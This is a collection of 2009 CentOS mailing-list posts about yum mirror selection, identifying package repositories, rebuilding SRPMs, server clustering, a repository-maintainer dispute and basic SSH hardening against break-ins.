Re: [CentOS] What repo did this rpm come from? rpm-VVa failures on new install
Vendor: Fedora Project If (Vendor == Fedora Project) then repo is epel if (Vendor == Centos) then repo is Centos if (Vendor == Dag Apt Repository) repo is rpmforge useful info. thanx. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
my region Linux Advocate wrote: johny, thanx for the link. i think 'my' should point to jp, cn, tw, au,sg. the setup u have there is ;) do all ISP's in .MY use the same peering/trunking or do different providers have different sorts of international backbone connections? different. we have routes to sg, tw (jp, cn) and then one to au. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
inetnum: 60.48.0.0 - 60.54.255.255 netname: XDSLSTREAMYX descr:Telekom Malaysia Berhad descr:Network Strategy descr:Wisma Telekom descr:Jalan Pantai Baru descr:50672 Kuala Lumpur country: MY . A couple different geo-ip databases I queried on the web (geoiptool.com maxmind.com) concurred yes. so normally i choose mirrors frm taiwan, japan, australia... always got the best speeds frm them. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
John R Pierce wrote: fwiw, it appears linux advocate is sending his email from a Malaysia IP per the email headres... $ whois 60.50.xxx.yyy [Querying whois.apnic.net] [whois.apnic.net] % [whois.apnic.net node-2] % Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html inetnum: 60.48.0.0 - 60.54.255.255 netname: XDSLSTREAMYX descr:Telekom Malaysia Berhad descr:Network Strategy descr:Wisma Telekom descr:Jalan Pantai Baru descr:50672 Kuala Lumpur country: MY For the record on this one, it seems that our version of the geoip database does not do a proper lookup for IP addresses in the 60.50.50.50 (as an example IP of that range). What I get is unknown (with our current version). When unknown, it passes a list of high bandwidth machines. I will get and build a newer version of the GeoIP database and see if I can get a better result. johny, are u the maintainer for the geo-ip database? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
#mirrorlist=http://mirrorlist.centos.org/?release=$releaseverarch=$basearchrepo=os baseurl=ftp://mirror.internode.on.net/pub/centos/$releasever/os/$basearch/ gpgcheck=1 gpgkey=ftp://mirror.internode.on.net/pub/centos/RPM-GPG-KEY-CentOS-5 Regards, Oliver I have done this; -disabled the fastestmirror plugin ( frm the conf file by setting enabled=0 ) -modified CentOS-Base.repo [base-1] name=CentOS-5 - Base #mirrorlist=http://mirrorlist.centos.org/?release=5arch=i386repo=os baseurl=http://ftp.riken.jp/Linux/centos/$releasever/os/$basearch/ exclude=postfix* perl-MIME-Base64 perl-DBI priority=1 enabled=1 what about the rpmforge repos? Will this link do? http://ftp.riken.jp/Linux/dag/redhat/el5/en/i386/rpmforge/RPMS/ ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
If you take a look in /etc/yum.repos.d/ you will see a number of files. There should be example baseurl lines in the repo files which will be commented out by default. Here's an example of how I use this to manually use my local ISPs mirror for the base repo: [base] name=CentOS-$releasever - Base #mirrorlist=http://mirrorlist.centos.org/?release=$releaseverarch=$basearchrepo=os baseurl=ftp://mirror.internode.on.net/pub/centos/$releasever/os/$basearch/ gpgcheck=1 gpgkey=ftp://mirror.internode.on.net/pub/centos/RPM-GPG-KEY-CentOS-5 Regards, Oliver I have done this; -disabled the fastestmirror plugin ( frm the conf file by setting enabled=0 ) -modified CentOS-Base.repo [base-1] name=CentOS-5 - Base #mirrorlist=http://mirrorlist.centos.org/?release=5arch=i386repo=os baseurl=http://ftp.riken.jp/Linux/centos/$releasever/os/$basearch/ exclude=postfix* perl-MIME-Base64 perl-DBI priority=1 enabled=1 what about the rpmforge repos? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
my repos are configured to use mirrorlist. how do i add mirrors manually? If you take a look in /etc/yum.repos.d/ you will see a number of files. There should be example baseurl lines in the repo files which will be commented out by default. Here's an example of how I use this to manually use my local ISPs mirror for the base repo: [base] name=CentOS-$releasever - Base #mirrorlist=http://mirrorlist.centos.org/?release=$releaseverarch=$basearchrepo=os baseurl=ftp://mirror.internode.on.net/pub/centos/$releasever/os/$basearch/ gpgcheck=1 gpgkey=ftp://mirror.internode.on.net/pub/centos/RPM-GPG-KEY-CentOS-5 Regards, Oliver oliver what kind of speeds do u get? what line do u have? i have a 1.0 mbps adsl ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
#mirrorlist=http://mirrorlist.centos.org/?release=$releaseverarch=$basearchrepo=os baseurl=ftp://mirror.internode.on.net/pub/centos/$releasever/os/$basearch/ gpgcheck=1 gpgkey=ftp://mirror.internode.on.net/pub/centos/RPM-GPG-KEY-CentOS-5 Regards, Oliver oliver what kind of speeds do u get? what line do u have? i have a 1.0 mbps adsl I get 10Mbits from my own ISP's mirror, and I'd probably get the same from any other official Australian mirror sites. I have ADSL2+. If I tried any mirror sites outside of Australia it would probably be noticeably slower. If you're in SE Asia I'd imagine any mirror site in Singapore or Korea or Japan should be quite fast. Those countries seem to be the main hubs for traffic in that region. what site do u use for rpmforge? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
I maintain the RPM that is used as part of CentOS Extras and that we use on the CentOS servers in question. I did some major work on the app that CentOS uses for mirrorlists and isolists over the weekend. Especially in the AP region, as we have picked up some mirrors there recently. Here is a thread that shows the relationship logic of the app: http://lists.centos.org/pipermail/centos/2009-August/081033.html If people who think the lists need to change will tell me the good and bad servers for their country, I can change the logic. Thanks, Johnny Hughes johny, thanx for the link. i think 'my' should point to jp, cn, tw, au,sg. the setup u have there is ;) ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] fasttest mirror -doesnt seem to pick sites near my region
guys, i have the yum plugin - fastest mirror . But not even once i have seen it selecting repos which are near my region such as japan or australia ( where i get the best speeds). Something is wrong. It seems stuck with these 3 sites ; Determining fastest mirrors * ftp-stud.fht-esslingen.de : 0.309373 secs * apt.sw.be : 0.483867 secs * fr2.rpmfind.net : 0.503842 secs ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
i have tried yum clean all , yum clean metadata - Original Message From: Linux Advocate linuxhous...@yahoo.com To: CentOS mailing list centos@centos.org Sent: Saturday, August 22, 2009 8:56:37 PM Subject: [CentOS] fasttest mirror -doesnt seem to pick sites near my region guys, i have the yum plugin - fastest mirror . But not even once i have seen it selecting repos which are near my region such as japan or australia ( where i get the best speeds). Something is wrong. It seems stuck with these 3 sites ; Determining fastest mirrors * ftp-stud.fht-esslingen.de : 0.309373 secs * apt.sw.be : 0.483867 secs * fr2.rpmfind.net : 0.503842 secs ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fasttest mirror -doesnt seem to pick sites near my region
Hi Linux Advocate, I have found this a problem for the Australian servers I manage as well. I suggest you manually test the speed of some local mirrors then manually specify a mirror rather than relying on the fastest mirror plugin. If your ISP mirrors content locally then that'd be the logical mirror to use. my repos are configured to use mirrorlist. how do i add mirrors manually? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] firewall question
- Original Message From: William L. Maltby centos4b...@triad.rr.com To: CentOS mailing list centos@centos.org Sent: Tuesday, August 4, 2009 4:15:40 PM Subject: Re: [CentOS] firewall question On Mon, 2009-08-03 at 17:39 -0500, Lanny Marcus wrote: Or IPcop? BTW, Scott and other IPCop users, there is a new version of IPCop coming out. It's in testing now: That's good to hear. I was afraid the project was dead. It had been so long since a release. if ipcop goes down, there is always shorewall. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] Yum - which repo did a package come from
guys, i have installed mailscanner, spamassassin, etc on my machine. This was done sometime ago. Some of these rpms i got not frm centos repos. What command ( or yum command ) can i use to find out which repo did this installled package come from. yum info packagename just says; repo : installed i was hoping for something like repo:rpmforge or something similiar. i have these 3 rpms which i cant remember where i got them from. dovecot-1.0.7-7.el5 mailscanner-4.74.13-2 spamassassin-3.2.5-1.el5 Regards, Marco. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Yum - which repo did a package come from
Frank, On Mon, 03 Aug 2009 23:33:52 -0700 (PDT) Linux Advocate wrote: What command ( or yum command ) can i use to find out which repo did this installled package come from. rpm -qi packagename # rpm -qi spamassassin Name: spamassassin Relocations: /usr Version : 3.2.5 Vendor: CentOS Release : 1.el5 Build Date: Wed 21 Jan 2009 02:35:38 PM MYT Install Date: Tue 02 Jun 2009 12:28:52 AM MYT Build Host: builder16.centos.org Group : Applications/Internet Source RPM: spamassassin-3.2.5-1.el5.src.rpm Size: 2753255 License: ASL 2.0 Signature : DSA/SHA1, Mon 09 Mar 2009 09:49:14 AM MYT, Key ID a8a447dce8562897 URL : http://spamassassin.apache.org/ Summary : Spam filter for email which can be invoked from mail delivery agents. Description : SpamAssassin provides you with a way to reduce if not completely eliminate Unsolicited Commercial Email (SPAM) from your incoming email. frm the vendor line, i can see centos...so this rpm was frm the official centos repos? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Yum - which repo did a package come from
What command ( or yum command ) can i use to find out which repo did this installled package come from. rpm -qi packagename # rpm -qi mailscanner Name: mailscanner Relocations: (not relocatable) Version : 4.74.13 Vendor: Electronics and Computer Science, University of Southampton Release : 2 Build Date: Mon 05 Jan 2009 03:44:33 AM MYT Install Date: Sat 28 Feb 2009 05:54:11 PM MYT Build Host: alegria.ecs.soton.ac.uk Group : System Environment/DaemonsSource RPM: mailscanner-4.74.13-2.src.rpm Size: 2892864 License: GPL Signature : DSA/SHA1, Tue 06 Jan 2009 05:32:59 AM MYT, Key ID f21f6e07e67c046c Packager: Julian Field mailscan...@ecs.soton.ac.uk URL : http://www.mailscanner.info/ Summary : E-Mail Gateway Virus Scanner and Spam Detector Description : MailScanner is a freely distributable E-Mail gateway virus scanner and spam detector. It uses Postfix, sendmail, ZMailer, Qmail or Exim as its basis, and a choice of 22 commercial virus scanning engines to do the actual virus scanning. But i know that i got the mailscanner rpm from the vanderkooij repo... but the vendor line shows julian fields employer? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] RPMs for vispan , spamstat, phplistadmin
Guys, i have heard of vispan, phplistadmin, spamstat from the mailscanner manual and would like to experiment with them. 1. Any thoughts on them? ( i am trying to avoid mailwatch bcos i think vispan is better fit for reporting) 2. I have googled for their centos rpms but no luck? Any ideas where i can get their rpms? regards, marco. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Yum - which repo did a package come from
Yes, I have found this is a limitation of yum. It would be nice if the information about the source repository could be stored somewhere. If these were installed after the initial OS installation, and you haven't done a yum clean, you might be able to glean some info from the cache: # ls -l /var/cache/yum/*/packages This won't give you any information about packages installed using rpm directly instead of yum. tony, i did yum clean when i upgraded to 5.3 ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
enough is enough already. can some centos admin please discipline, ban and/or get rid of Radu-Cristian FOTESCU aka beranger...@yahoo.ca please? not only has he physically threatened a contributor, his language behavior are more than inappropriate for such a professional atmosphere that has been developed and become a long term testimony at centos.org i support this motion. i think karanbir or whoever is the admin should step in. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
Niki, could u tell me howto build frm SRPM? i am not good at this area and would like to learn this. - Original Message From: Niki Kovacs cont...@kikinovak.net To: CentOS mailing list centos@centos.org Sent: Tuesday, June 30, 2009 5:11:54 PM Subject: Re: [CentOS] Dag's comment at linuxtag David Hrbác a écrit : Niki, that's starting the flame. Compare to PLD linux... more than 1 RPMs... Well, no flame intended. So let me just add this. I'm a happy RPMForge repo user. No other third-party repos. I've learned how to circumvent the odd quirks in the repo (like: how do I use VLC and Audacity at the same time). And if a package is not in RPMForge (which happens, but rarely), well, I grab the SRPM and build it myself. I also have a small repo, but only for private use, so replication is easy. So let's get this straight: huge pat on the shoulder for Dag. Thanks for your great repo ! Niki ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
david, could u tell me how to build frm SRPMS. i m not good in this area and would like to improve. - Original Message From: David Hrbác( hrbac.c...@seznam.cz To: CentOS mailing list centos@centos.org Sent: Tuesday, June 30, 2009 5:52:37 PM Subject: Re: [CentOS] Dag's comment at linuxtag Niki Kovacs napsal(a): Well, no flame intended. So let me just add this. I'm a happy RPMForge repo user. No other third-party repos. I've learned how to circumvent the odd quirks in the repo (like: how do I use VLC and Audacity at the same time). And if a package is not in RPMForge (which happens, but rarely), well, I grab the SRPM and build it myself. I also have a small repo, but only for private use, so replication is easy. Niki, I'm at the very same point. Only rpmforge and my repos user. David ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
Rather than dumping *even more work* on the core CentOS project (who are already clearly struggling to provide even the core distro at present), why doesn't everyone do as Dag suggested, and adopt a handful of packages and help maintain them at rpmforge for the benefit of everyone. If everyone who has offered help in this thread, or commented that they maintain their own repos, offered to maintain a handful of packages at rpmforge then it all adds up. good idea. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
great. thanx. - Original Message From: Robert Heller hel...@deepsoft.com could u tell me howto build frm SRPM? i am not good at this area and would like to learn this. Simple form (should work with most packages): # rpmbuild --rebuild package-version-release.srpm 'man rpmbuild' for more details. This assumes that the spec file does not need tinkering with. Generally you don't need to mess with the spec file if the SRPM is/was built for your distro. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
On Tue, Jun 30, 2009 at 14:18, Linux Advocatewrote: could u tell me howto build frm SRPM? i am not good at this area and would like to learn this. This article in the Wiki should get you going... http://wiki.centos.org/HowTos/RebuildSRPM HTH, Filipe thanx. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
can dag karanbir sort of sum up this thread as to how list members can work together on improving all the additional non-redhat-originated packages from rpmforge,etc. As for radu-cristian, relax bro. As for others (myself included), lets all chill out. this thread should not evolve into personal attacks. venting happens once awhile. so lets all work together to keep making centos a good cholce for users. - Original Message From: Les Mikesell lesmikes...@gmail.com To: CentOS mailing list centos@centos.org Sent: Wednesday, July 1, 2009 8:42:02 AM Subject: Re: [CentOS] Dag's comment at linuxtag Radu-Cristian FOTESCU wrote: RPMRepo is the best proof that collaboration is close to impossible. Collaboration isn't exactly the point - in fact the differences are a good thing. There are legitimate reasons (besides the obvious differences of opinions) for incompatibly different versions of things to exist and to be wanted on different machines. The problem is not so much that these differences exist, but that the potential users (A) don't have a good way to know what the differences are and why they might want one version over another, and (B) the distro tools are not good at all at maintaining updates from a bunch of different repositories. And ElRepo is the best proof that other small repos could arise, and they have a reason to exist. But all this is on the expenses (not pecuniary, but *nervous*) of the end user, who will get confused and who might also experience system breakage. (No, priorities don't fix everything that easily.) ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] 2 servers cluster
thanx. i missed that From: Neil Aggarwal n...@jammconsulting.com To: CentOS mailing list centos@centos.org Sent: Monday, June 29, 2009 10:36:37 PM Subject: Re: [CentOS] 2 servers cluster You will still be limited to a single primary server with DRBD. Here is a line from their site: DRBD's primary-primary mode with a shared disk file system (GFS, OCFS2). These systems are very sensitive to failures of the replication network. Currently we cannot generally recommend this for production use. -- Neil Aggarwal, (281)846-8957, www.JAMMConsulting.com 100% uptime for your e-commerce site! Stay fully operational even with a db server failure. Ask me about the GRed database. From: centos-boun...@centos.org [mailto:centos-boun...@centos.org] On Behalf Of Linux Advocate Sent: Monday, June 29, 2009 12:13 AM To: CentOS mailing list Subject: Re: [CentOS] 2 servers cluster thanx bro. yes i have been looking as well. have looked at drbd... From: Neil Aggarwal n...@jammconsulting.com To: CentOS mailing list centos@centos.org Sent: Monday, June 29, 2009 12:32:46 PM Subject: Re: [CentOS] 2 servers cluster We tried Sequioa: http://www.continuent.com/community/lab-projects/sequoia We wanted automatic failover and geographical distribution of the database nodes. Sequoia only supports master-master operation if the database nodes are on the same subnet. We did not find anything else out there, so we wrote our own geographically distributed database system. We can adapt that to your project if you are interested. Neil -- Neil Aggarwal, (281)846-8957, www.JAMMConsulting.com Your e-commerce site can be geographically redundant and available even if failure occurs. Ask me about the GRed database system. From: centos-boun...@centos.org [mailto:centos-boun...@centos.org] On Behalf Of Linux Advocate Sent: Sunday, June 28, 2009 11:18 PM To: CentOS mailing list Subject: Re: [CentOS] 2 servers cluster taling abt piranha... i understand that its LVS + webfrontend and is suitable fro webpages and so on. What do we need to make it as a LAMP cluster, i.e with a mysql HA backend as well. So- HA of [ LoadBalancer + Apache + MySQL} Any ideas guys? From: fmb fmb fee...@googlemail.com To: CentOS mailing list centos@centos.org Sent: Saturday, June 27, 2009 11:14:33 PM Subject: Re: [CentOS] 2 servers cluster Thnx Brian. This is the first thing that I will do... On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis brian.mat...@gmail.com wrote: CentOS has the redhat piranha packages available for install. Piranha is a repackaging of the linux virtual server software, along with a web-based front-end. You can find information about that in the CentOS docs and also by googling for redhat piranha. On Fri, Jun 26, 2009 at 11:57 PM, fmb fmbfee...@googlemail.com wrote: Hi, I am thinking of setting up two servers in load balance mode. I would really appreciate your suggestions and hints... thnx, ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
same here. i really must thank dag wiers and gang for all the good work. But If epel and rpmforge can work together , that's great. - Original Message From: Ron Loftin relof...@twcny.rr.com To: CentOS mailing list centos@centos.org Sent: Tuesday, June 30, 2009 3:13:33 AM Subject: Re: [CentOS] Dag's comment at linuxtag While I don't want to just add noise to this thread, I think that there might be some miscommunication and/or misunderstanding involved here. I also want to express my appreciation to Dag and the folks who maintain the RPMforge repo, as I find it quite useful. On Mon, 2009-06-29 at 20:34 +0200, Dag Wieers wrote: On Mon, 29 Jun 2009, Radu-Cristian FOTESCU wrote: A quick look at http://distrowatch.com/table.php?distribution=centos shows that a great majority of the packages are not even close to being up-to-date, and that is a good thing for those us of who care more about stability than eyecandy. That can't be other way. For instance, you can't build GIMP 2.4 or 2.6 unless you you upgrade to a newer GTK+, which would impact on a lot of apps. The impression I get from the above exchange is that someone either has not read the CentOS mission statement, or does not understand it in the context of enterprise and stable distribution. This leads to dissatisfaction with their installations, since one of the costs of long-term stability is loss of the capability to upgrade package versions in a piecemeal manner. OTOH, Dag is in a funny position: he's the main maintainer of RPMforge, which has 2 main issues: (1) It's broken, at least partially. Try install audacious for one. (2) It's incompatible with EPEL. Try install MPlayer and VLC with EPEL enabled. These observations, while technically correct, show a lack of familiarity with the long-running differences of opinion between the RPMforge folks and the EPEL crew. Again, in the technical/factual universe, I support Dag's response below, but in the political/emotional world, I hope that this is not indicating a bump up against the limits of his patience with these conflicting viewpoints. (1) I expect now patches from you to make a workable audacious based on our audacious package. Apparently you have the interest and the time to do it ? (2) No, they are not compatible, we know. Share to help with this too ? You first have to convince the Fedora people that they will not introduce new incompatibilities before starting. I'd right merge, but also that is not happening as there is no interest. So what is the solution ? Shall I simply stop doing RPMforge ? Here I will speak for myself, while hoping that there are others who will agree: HELL NO !!! I'm not enough of a programmer to even THINK of replacing the talent you bring to the table, and I suspect that there are relatively few people who DO posses those skills who would also have the dedication you do. I will say it if nobody else will: The distros supported by RPMforge would be poorer without your efforts. Is that the position you prefer to force me into ? Because I certainly did not force you into using the repository. On the lighter side: If you HAD forced anyone to use the repository, I suspect that you would have forced them to read the relevant docs ( HOWTOs, etc. ) FIRST. ; I don't know even why you want to use RPMforge, there must be something that is missing from EPEL ? I am happy to learn what you want to do though, because it is easy to criticize, but it takes time to do some work. (And I hope the solution is not another repository, because we have been there :-)) -- Ron Loftin relof...@twcny.rr.com God, root, what is difference ? Piter from UserFriendly ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Dag's comment at linuxtag
beranger...@yahoo.com... , u have a problem with dag...and now it looks like u have a problem with linus torvalds himself u talk abt the need for cooperation,etc but you apparently dont get that 'you have to give respect to get respect' 'give cooperation to get cooperation' relax bro. - Original Message From: Radu-Cristian FOTESCU beranger...@yahoo.ca To: CentOS mailing list centos@centos.org Sent: Tuesday, June 30, 2009 9:51:54 AM Subject: Re: [CentOS] Dag's comment at linuxtag led to the great compiler we have today. The same would hold for any large project (the kernel, firefox, etc.) And... are you happy with the quality of the huge $h1t which is Firefox? Because I am not. As for the Linux kernel, they pushed in all kind of crap. Back in 1996, I was running Linux with X in only 8 Megs of RAM! Now, I doubt I could even boot with such a memory... Linux is not like Jesus. Linux is not good, nor great. It's only much less worse than Windows, and marginally better than the BSDs. Of course, it's open source and so on. But it's a huge crap like everything that's software nowadays. I fail to see why tens of micro repos are easier to maintain consistent than a large one. They're not. But at least you don't have to make people get along. 7,600 packages is really too much for a couple of people to maintain. Unless it's scaled *down*... ...or scale the maintainers up. Still, 7,600 is unmaintainable. For their ~20k packages, both Debian and Ubuntu use dozens and dozens of packages. (And I won't mention the quality of Ubuntu's packages.) As for TUV, they decided they can only support ~2.5k packages, regardless of the fact that they're the #1 Linux company. I maintain that RF is way too large to be properly maintainable. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] server is always getting hacked
get ; 1. fail2ban - it blocks failed login ips etc 2. get shorewall or any iptables front end and restrict ips to the ranges u need ( or even specific ips) 3. run ssh on a nonstandard port 4. good, long password these steps will go a long way and will get u started. - Original Message From: Mag Gam magaw...@gmail.com To: CentOS mailing list centos@centos.org Sent: Sunday, June 28, 2009 3:21:25 AM Subject: [CentOS] server is always getting hacked WE have a centos 5.3 install, and our server is keep getting hacked. We see load averages of 500+ and see people from all over the world logging into our server (used last). Is there a good place to start to avoid these kinds of things? For example, here is what I already did. Open up sshd port only setup iptables to only accept port 80 and 22 No FTP No other ports are allowed according to IP Tables. I am not sure what else measures I can take. Can someone please assist? TIA ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] 2 servers cluster
taling abt piranha... i understand that its LVS + webfrontend and is suitable fro webpages and so on. What do we need to make it as a LAMP cluster, i.e with a mysql HA backend as well. So- HA of [ LoadBalancer + Apache + MySQL} Any ideas guys? From: fmb fmb fee...@googlemail.com To: CentOS mailing list centos@centos.org Sent: Saturday, June 27, 2009 11:14:33 PM Subject: Re: [CentOS] 2 servers cluster Thnx Brian. This is the first thing that I will do... On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis brian.mat...@gmail.com wrote: CentOS has the redhat piranha packages available for install. Piranha is a repackaging of the linux virtual server software, along with a web-based front-end. You can find information about that in the CentOS docs and also by googling for redhat piranha. On Fri, Jun 26, 2009 at 11:57 PM, fmb fmbfee...@googlemail.com wrote: Hi, I am thinking of setting up two servers in load balance mode. I would really appreciate your suggestions and hints... thnx, ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] 2 servers cluster
thanx bro. yes i have been looking as well. have looked at drbd... From: Neil Aggarwal n...@jammconsulting.com To: CentOS mailing list centos@centos.org Sent: Monday, June 29, 2009 12:32:46 PM Subject: Re: [CentOS] 2 servers cluster We tried Sequioa: http://www.continuent.com/community/lab-projects/sequoia We wanted automatic failover and geographical distribution of the database nodes. Sequoia only supports master-master operation if the database nodes are on the same subnet. We did not find anything else out there, so we wrote our own geographically distributed database system. We can adapt that to your project if you are interested. Neil -- Neil Aggarwal, (281)846-8957, www.JAMMConsulting.com Your e-commerce site can be geographically redundant and available even if failure occurs. Ask me about the GRed database system. From: centos-boun...@centos.org [mailto:centos-boun...@centos.org] On Behalf Of Linux Advocate Sent: Sunday, June 28, 2009 11:18 PM To: CentOS mailing list Subject: Re: [CentOS] 2 servers cluster taling abt piranha... i understand that its LVS + webfrontend and is suitable fro webpages and so on. What do we need to make it as a LAMP cluster, i.e with a mysql HA backend as well. So- HA of [ LoadBalancer + Apache + MySQL} Any ideas guys? From: fmb fmb fee...@googlemail.com To: CentOS mailing list centos@centos.org Sent: Saturday, June 27, 2009 11:14:33 PM Subject: Re: [CentOS] 2 servers cluster Thnx Brian. This is the first thing that I will do... On Sat, Jun 27, 2009 at 5:29 PM, Brian Mathis brian.mat...@gmail.com wrote: CentOS has the redhat piranha packages available for install. Piranha is a repackaging of the linux virtual server software, along with a web-based front-end. You can find information about that in the CentOS docs and also by googling for redhat piranha. On Fri, Jun 26, 2009 at 11:57 PM, fmb fmbfee...@googlemail.com wrote: Hi, I am thinking of setting up two servers in load balance mode. I would really appreciate your suggestions and hints... thnx, ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Program to ban sniffers
That program would then, upon receiving a 'sniff' or 'user' would then add that ip to the deny hosts lists..for either a long or short time. Using this would seem like a win as you can easily grab someone before they can get somewhere one hopes. Also, by opening up a few other ports that are unusual like 8561well, if someone sniffs that it could be a 3 day ban or a month... In other words, anyone hitting those ports that are not being used at all except by our sniff protector, would allow instant banning. So...does something like this exist? fail2ban... near enough a fit... ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] ssh security
[Normal log stuff from dictionary attack deleted...] This is common, and, presuming you have good passwords or only accept authorized_keys, not a real problem other than large log files. Look at fail2ban for a method that will automatically add iptables blocks when this occurs. yes fail2ban is very useful. but also good to change to a non standard port. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....[SOLVED]
thanx guys. Lets close this thread. bye. - Original Message From: Scott Silva ssi...@sgvwater.com To: centos@centos.org Sent: Thursday, June 18, 2009 2:36:27 AM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell on 6-16-2009 10:26 PM Linux Advocate spake the following: cmdshell.php) ? The horde framework was installed from the centos repo.!!! I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current. ok. its just that with centos being a redhat clone and so on. all the rpms they use are suppose to hv been 'vetted' right but anywat... its a lesson learnt. I think the horde stuff is in extras or plus, and not maintained AFAIK. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
cmdshell.php) ? The horde framework was installed from the centos repo.!!! I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current. ok. its just that with centos being a redhat clone and so on. all the rpms they use are suppose to hv been 'vetted' right but anywat... its a lesson learnt. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] setrubleshootd dominating
On Wed, Jun 3, 2009 at 6:32 PM, Frank M. Ramaekers wrote: Anyone have any idea as to why setroubleshootd would be dominating the system: PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 2371 root 25 0 1884m 1.8g 4100 R 100.2 44.7 680:06.40 setroubleshootd strace -p And see what it is doing? does this strace command exist in centos 5.x? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
